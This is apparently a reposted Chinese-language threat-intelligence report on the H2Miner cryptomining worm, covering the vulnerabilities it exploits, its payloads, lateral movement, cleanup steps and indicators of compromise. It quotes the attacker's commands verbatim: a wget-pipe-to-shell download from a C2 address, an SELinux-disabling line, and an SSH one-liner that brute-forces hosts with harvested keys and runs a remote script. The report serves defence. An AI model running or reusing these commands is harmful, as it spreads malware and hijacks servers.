Linux服务器遭遇挖矿蠕虫攻击，已有数千台服务器中招-诺言资源网-官方网站

AI摘要

诺言资源网

腾讯安全威胁情报中心捕获H2Miner挖矿蠕虫新变种。H2Miner是一个linux下的大型挖矿僵尸网络，已被发现通过多个高危漏洞入侵Linux系统，并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心预估已有数千台服务器中招，腾讯安全专家建议相关企业尽快排查服务器被入侵的情况，及时清除H2Miner挖矿蠕虫病毒。

腾讯安全威胁情报中心本次捕获的H2Miner挖矿蠕虫样本会下载恶意脚本及恶意程序进行挖矿牟利，横向扫描扩大攻击面并维持与远程服务器（C2）通信，令服务器变成黑客控制的肉鸡。同时，具有卸载云服务器安全软件、删除云服务器镜像的能力，会给企业云服务器安全带来严重影响。

H2Miner挖矿蠕虫利用的高危漏洞包括：

Redis未授权RCE；

Solr dataimport RCE(CVE-2019-0193)；

Hadoop Yarn REST API未授权RCE(CVE-2017-15718)；

Docker Remote API未授权RCE；

ThinkPHP5 RCE；

Confluence 未授权RCE(CVE-2019-3396)；

SaltStack RCE（CVE-2020-11651）

等多个Web应用漏洞。

此次H2Miner变种更新了C2服务器地址，在横向移动时会从/.ssh/config, .bash_history, /.ssh/known_hosts等多个文件中搜索目标机器和认证信息，并利用搜索得到的userlist、hostlist、keylist、sshports进行组合尝试爆破登录，从而扩大其攻击范围。

二、样本分析

Docker是一个开源的应用容器引擎，开发者可以打包他们的应用以及依赖包到一个可移植的容器中，然后发布到任何流行的LINUX机器上，也可以实现虚拟化。Docker swarm 由docker官方提供，是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker API，能够方便docker集群的管理和扩展。使用docker swarm的时候，管理的docker 节点上会开放一个TCP端口2375（或2376）。

攻击者利用未受保护的开放Docker API端口进行攻击，并执行恶意命令：

wget -q -O – http[:]//93.189.43.3/d.sh | sh

d.sh执行以下操作：

1. 禁用SELINUX并清除系统日志：echo SELINUX=disabled >/etc/selinux/config；

2. 卸载阿里云骑士和腾讯云镜；

3. 清除竞品挖矿木马；

4. 杀死正在运行的恶意Docker容器并删除它们的映像；

5. 下载恶意程序“kinsing”并运行；

6. 通过crontab定时任务每分钟下载和执行shell脚本；

7. 删除竞品挖矿木马的crontab定时任务。

下载得到的kinsing采用Golang编写，被编译为Linux平台可执行程序，主要有以下功能：

1.下载文件并执行；

2.启动和维持挖矿程序；

3.与C&C服务器通信，接收并执行远程命令；

3.利用masscan对外扫描；

4.针对redis服务进行爆破攻击；

5.下载shell脚本http[:]//93.189.43.3/spre.sh，以进行横向移动。

受影响的主机会以http的方式与C&C服务器185.154.53.140进行通信，其中肉鸡的信息在http头部中标识。

Kinsing释放门罗币挖矿木马到/tmp/kdevtmpfsi，然后启动连接矿池xmr-eu1.nanopool.org挖矿，配置中使用门罗币钱包为：

46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb

挖矿使用矿池和钱包与腾讯安全此前捕获到的版本(H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿，已获利370万元https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q)中使用的相同。

横向移动

Spre.sh是用于在网络中横向传播H2Miner的shell脚本。为了发现攻击目标并找与其相对应的身份验证的信息，脚本会从 /.ssh/config, .bash_history, /.ssh/known_hosts进行搜索和匹配。

利用收集到的信息，恶意脚本尝试通过SSH连接到每个主机，使用每个可能的用户和密钥组合进行爆破登录，以便在网络中的其他主机或容器上下载和运行shell脚本Spr.sh，spr.sh与最初攻击时的d.sh相同。

以下SSH命令用于在网络中传播H2Miner：

ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http[:]//93.189.43.3/spr.sh|sh; sudo wget -q -O - http[:]//93.189.43.3/spr.sh|sh;"

三、手动清除H2Miner建议

1、查找路径为/tmp/kinsing、/tmp/kinsing2、/tmp/kdevtmpfsi的进程，将其kill掉并删除对应的文件；

2、查找crontab任务中包含“195.3.146.118”的相关项并删除。

195.3.146.118

142.44.191.122

185.92.74.42

217.12.221.244

93.189.43.3

185.154.53.140

Md5

kdevtmpfsi	8c6681daba966addd295ad89bf5146af
kinsing	52ca5bc47c84a748d2b349871331d36a
a.sh	e3af308c4a4130dd77dc5772d801ebab
cron.sh	bd405b37e69799492a58a50f5efc2725
d.sh	be17040e1a4eaf7e2df8c0273ff2dfd2
ex.sh	7f469ccecbf9d0573f0efd456e8e63a7
h2.sh	1b34c5bb3a06c4439b5da77c49f14cf7
j.sh	41640173ddb6a207612ee052b48dd8be
lf.sh	bac660c7aa23f4fda6c699c75b4b89f1
p.sh	e040303652c05dbf6469c9c3ce68031a
pa.sh	18dc6621299b855793bdeaad8ef5af23
s.sh	1c489a326a4d37fbf02680bbd6f38b4f
spr.sh	255779cf6134f3ac5133f04868e3956c
spre.sh	639d87d54aa57371cc0bf82409503311
t.sh	ae9017bbeac57bc4de1ac5f59d59c519
tf.sh	831093a5a825ab096c2fc73a7a52bbf1
al.sh	d06e2a3f52043c3a3c3ecf1f406b8241